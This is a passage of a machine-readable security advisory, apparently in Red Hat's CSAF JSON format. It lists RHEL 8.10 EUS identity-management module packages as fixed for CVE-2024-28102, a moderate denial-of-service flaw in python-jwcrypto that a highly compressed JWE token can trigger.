"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "JWCrypto: denail of service Via specifically crafted JWE"
},
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
